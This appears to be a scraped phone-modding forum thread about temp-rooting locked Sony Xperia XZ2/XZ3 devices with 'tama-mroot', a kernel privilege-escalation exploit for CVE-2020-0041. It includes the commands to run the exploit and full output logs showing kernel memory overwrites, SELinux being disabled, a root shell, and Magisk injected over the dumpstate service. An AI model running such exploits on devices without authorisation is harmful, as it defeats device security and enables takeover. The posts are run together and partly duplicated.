i am very happy with this root method. but is it possible to have tama-mroot updated to the new version? because when i tried to update the root myself with the magisk app, it always broke my phone. the new magisk root version has zygisk and i really need it. and i would very thankful if the tama-mroot could be updated.CHANGELOG
- 2020-05-14 : released initial version of tama-root (no magisk support, problem with 'Required key not available' returned from some commands)
- 2020-05-22 : finally got magisk from temp root working including permission asking feature - released as tama-mroot.zip
Hi rdhany, can you show me how to replace the firmware list? Iam using xz3 softbank.@j4nn I tried to replace one of the list firmware with my firmware and got results like this
./data/local/tmp/tama-mroot
[+] Detected SO-04K-52.1.B.0.188 target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffef7242a700
[+] file epitem at ffffffef247c0e80
[+] Reallocating content of 'write8_inode' with controlled data.....[DONE]
[+] Overwriting 0xffffffef7242a720 with 0xffffffef247c0ed0...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff8e8801ebf8
[+] kernel base: ffffff8e86e80000
[+] Reallocating content of 'write8_selinux' with controlled data.[DONE]
[+] Overwriting 0xffffff8e89290000 with 0x0...[DONE]
[+] init_cred: ffffff8e8902fcd0
[+] memstart_addr: 0x752f544e41495241
[+] First level entry: ee122003 -> next table at fffffff2acc8cdbf
Then reboots itself, does this have a chance for temproot?
Yess. No harm to systemHello, can I use magisk modules?
And what buns can you make in your xz2?
No harm to the system on the locked bootloader, thanks.
How to run via terminal to run root? more details? through the pc received No problem.
Hello u can find this rom if u using Xperia Companion. They have option for repair and u get a rom after they downloaded for repairing ur device.Firmware SO-04K-52.1.B.0.188 it uses Android 10. But this firmware can only be obtained with ota update, I've tried in the same way add android 9 firmware list to the exploit, which can be downloaded manually, but nothing happens. So I don't think it can be exploited.
just uploaded the fw version you have requested:Could you upload H8296-52.1.A.0.618 - xperia XZ2 dual and H8296_Customized TW_1313-6119_52.1.A.0.618_R4C.
Heyi am very happy with this root method. but is it possible to have tama-mroot updated to the new version? because when i tried to update the root myself with the magisk app, it always broke my phone. the new magisk root version has zygisk and i really need it. and i would very thankful if the tama-mroot could be updated.
Why not you just crossflash to target version of xz2c and get temproot .Hello, I know from someone that version 52.1.B.0.188
sony xz2compact docomo (SO-05K)
can be temprooted.
I already got
boot /kernel,abl,aop,bloototh a10 version 52.1.B.0.188 (SO-05K).
can someone develop and build an exploit for xz2c ( SO-05K) please help me
No that's not possibleHi everyone, I need some help here with my XZ3 SOV39 variant. I've downgraded from the latest SOV39 ROM to the global ROM mentioned in the top post using newflasher tool. I've successfully installed the Oneplus launcher into the oem folder and enabled the gesture navigation using the temp root method. However, my phone has lost the VoLTE function in the meantime after flashing the global FW.
So my questions are,
1. What are the steps to upgrade the firmware to the latest version without modifying the oem folder and losing the launcher?
2. Is the availability of VoLTE strictly tied to the OEM version or the firmware version?
3. Is there anyway to fix the VoLTE using the temp root method, for example Magisk modules? If not, would VoLTE work again if I flash the latest global firmware with the original Japan OEM partition?
It is onlly possible for global versionHello buddy can this tutor using to sony xperia xz3 japan? Im already with the same android 10 and kernel 4.9
You can try with this app if you have xbl partition backed up from bootloader unlocked deviceIts possible to unlock bootloader on xperia xz2 that running temproot? I have xperia xz2 but bootloader unlock allowed is no, another one lg v50 that running temproot can be unlock bootloader with xbl partition
Nope I'm already using temproot for XZ3 AU SOV39 without using rom Global it's ok, maybe at soon I'm make tutorial use for docomo, softbank and au temproot in xda. Btw for volte it's not lose for my country can be used since IMS not registered so I need time for fix thisIt is onlly possible for global version
You have to crossflash to targeted global version fw if you want temproot
And you will lose VoLTE
Glad to know thatNope I'm already using temproot for XZ3 AU SOV39 without using rom Global it's ok, maybe at soon I'm make tutorial use for docomo, softbank and au temproot in xda. Btw for volte it's not lose for my country can be used since IMS not registered so I need time for fix this
Hmmm someone ppl the last time try open unlock bootloader from backup boot.img from root device but this person get hardbrick and someday this person back again and said the device already unlock bootloader. Idk this possible or not since this person not said the detail how be can possible about that. For XBL partion someone wanna try this. But my problem is sim lock. AU provider give locked for network subset. I need know how be possible open this without s1unlocktool if do.Glad to know that
Btw is there any possibility to unlock bootloader without s1unlock tool
And how can we boot into edl mode.
it was possible for lg v50 i think by flashing xbl partition backed up from unlocked device
Having non unlockable bootloader device is headache.
Im gonna never buy sony mobiles again
Hmm it means no chanceHmmm someone ppl the last time try open unlock bootloader from backup boot.img from root device but this person get hardbrick and someday this person back again and said the device already unlock bootloader. Idk this possible or not since this person not said the detail how be can possible about that. For XBL partion someone wanna try this. But my problem is sim lock. AU provider give locked for network subset. I need know how be possible open this without s1unlocktool if do.
cd /data/local/tmp
unzip tama-mroot.zip
chmod 755 tama-mroot magisk-setup.sh magisk-start.sh
./magisk-setup.sh
cd /data/local/tmp
./tama-mroot
./magisk-start.sh -1
./magisk-start.sh -2
./magisk-start.sh -3
H8216:/ $ cd /data/local/tmp
H8216:/data/local/tmp $ ./tama-mroot
[+] Detected H8216-52.1.A.0.618 target
[+] Mapped 200000
[+] selinux_enforcing before exploit: 1
[+] pipe file: 0xffffffd07822fa00
[+] file epitem at ffffffd102da6d00
[+] Reallocating content of 'write8_inode' with controlled data...............[DONE]
[+] Overwriting 0xffffffd07822fa20 with 0xffffffd102da6d50...[DONE]
[+] Write done, should have arbitrary read now.
[+] file operations: ffffff9dee01ebf8
[+] kernel base: ffffff9dece80000
[+] Reallocating content of 'write8_selinux' with controlled data..[DONE]
[+] Overwriting 0xffffff9def290000 with 0x0...[DONE]
[+] init_cred: ffffff9def02fcd0
[+] memstart_addr: 0xfffffff040000000
[+] First level entry: ae7f6003 -> next table at ffffffd06e7f6000
[+] Second level entry: ae419003 -> next table at ffffffd06e419000
[+] sysctl_table_root = ffffff9def05c710
[+] Reallocating content of 'write8_sysctl' with controlled data.......[DONE]
[+] Overwriting 0xffffffd1316fc268 with 0xffffffd0ba748000...[DONE]
[+] Injected sysctl node!
[+] Node write8_inode, pid 7109, kaddr ffffffd0c1193700
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_selinux, pid 6726, kaddr ffffffd08bfeb400
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Node write8_sysctl, pid 6772, kaddr ffffffd0afc0d000
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Replaced sendmmsg dangling reference
[+] Cleaned up sendmsg threads
[+] epitem.next = ffffffd07822fa20
[+] epitem.prev = ffffffd07822fad8
[+] Launching privileged shell
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -1
+ FRESH=false
+ '[' -1 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ ./magiskpolicy --live --magisk 'allow dumpstate * * *'
Load policy from: /sys/fs/selinux/policy
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -2
+ FRESH=false
+ '[' -2 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=2
+ '[' 2 '=' 2 ']'
+ mount -t tmpfs -o 'mode=755' none /sbin
+ chcon u:object_r:rootfs:s0 /sbin
+ chmod 755 /sbin
+ cp -a magisk/boot_patch.sh /sbin
+ cp -a magisk/magiskboot /sbin
+ cp -a magisk/magiskinit64 /sbin
+ cp -a magisk/busybox /sbin
+ cp -a magisk/util_functions.sh /sbin
+ cd /sbin
+ chmod 755 boot_patch.sh busybox magiskboot magiskinit64 util_functions.sh
+ mkdir r
+ mount -o bind / r
+ cp -a r/sbin/. /sbin
+ umount r
+ rmdir r
+ mv magiskinit64 magiskinit
+ ./magiskinit -x magisk magisk
+ ln -s /sbin/magiskinit /sbin/magiskpolicy
+ ln -s /sbin/magiskinit /sbin/supolicy
+ false
+ chcon -R u:object_r:magisk_file:s0 /data/adb/magisk
+ rm -f magiskboot util_functions.sh boot_patch.sh
+ ln -s /sbin/magisk /sbin/su
+ ln -s /sbin/magisk /sbin/resetprop
+ ln -s /sbin/magisk /sbin/magiskhide
+ mkdir /sbin/.magisk
+ chmod 755 /sbin/.magisk
+ >/sbin/.magisk/config
+ echo 'KEEPVERITY=true'
+ >>/sbin/.magisk/config
+ echo 'KEEPFORCEENCRYPT=true'
+ chmod 000 /sbin/.magisk/config
+ mkdir -p /sbin/.magisk/busybox
+ chmod 755 /sbin/.magisk/busybox
+ mv busybox /sbin/.magisk/busybox
+ mkdir -p /sbin/.magisk/mirror
+ chmod 000 /sbin/.magisk/mirror
+ mkdir -p /sbin/.magisk/block
+ chmod 000 /sbin/.magisk/block
+ mkdir -p /sbin/.magisk/modules
+ chmod 755 /sbin/.magisk/modules
+ mkdir -p /data/adb/modules
+ chmod 755 /data/adb/modules
+ mkdir -p /data/adb/post-fs-data.d
+ chmod 755 /data/adb/post-fs-data.d
+ mkdir -p /data/adb/service.d
+ chmod 755 /data/adb/service.d
+ chcon -R -h u:object_r:rootfs:s0 /sbin/.magisk
+ chcon u:object_r:magisk_file:s0 /sbin/.magisk/busybox/busybox
+ /sbin/magisk --daemon
client: launching new main daemon process
+ pidof magiskd
+ MP=14148
+ '[' -z 14148 ']'
+ >/sbin/.magisk/escalate
+ echo 14148
+ '[' -e /sbin/.magisk/escalate ']'
+ sleep 1
+ '[' -e /sbin/.magisk/escalate ']'
root_by_cve-2020-0041:/data/local/tmp # ./magisk-start.sh -3
+ FRESH=false
+ '[' -3 '=' --fresh ']'
+ '[' ! -e /data/adb/magisk/busybox ']'
+ STAGE=3
+ '[' 3 '=' 2 ']'
+ >/sbin/.magisk/magiskd
+ echo -e '#!/system/bin/sh\n/sbin/magisk --daemon'
+ chmod 755 /sbin/.magisk/magiskd
+ chcon u:object_r:dumpstate_exec:s0 /sbin/.magisk/magiskd
+ getprop init.svc.dumpstate
+ SVC=''
+ timeout=10
+ '[' 10 -gt 0 ']'
+ stop dumpstate
+ killall -9 magiskd
+ stop dumpstate
+ mount -o bind /sbin/.magisk/magiskd /system/bin/dumpstate
+ start dumpstate
+ timeout=10
+ '[' 10 -le 0 ']'
+ pidof magiskd
+ MP=14165
+ '[' -n 14165 ']'
+ break
+ stop dumpstate
+ sleep 1
+ umount /system/bin/dumpstate
+ rm -f /sbin/.magisk/magiskd
+ '[' '' '=' running ']'
+ rm -f /dev/.magisk_unblock
+ /sbin/magisk --post-fs-data
+ timeout=10
+ '[' -e /dev/.magisk_unblock -o 10 -le 0 ']'
+ sleep 1
+ timeout=9
+ '[' -e /dev/.magisk_unblock -o 9 -le 0 ']'
+ /sbin/magisk --service
+ sleep 1
+ /sbin/magisk --boot-complete
+ chmod 751 /sbin
root_by_cve-2020-0041:/data/local/tmp # id
uid=0(root) gid=0(root) groups=0(root),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:magisk:s0
root_by_cve-2020-0041:/data/local/tmp # uname -a
Linux localhost 4.9.186-perf+ #1 SMP PREEMPT Fri Jan 17 01:22:05 2020 aarch64
root_by_cve-2020-0041:/data/local/tmp # getenforce
Permissive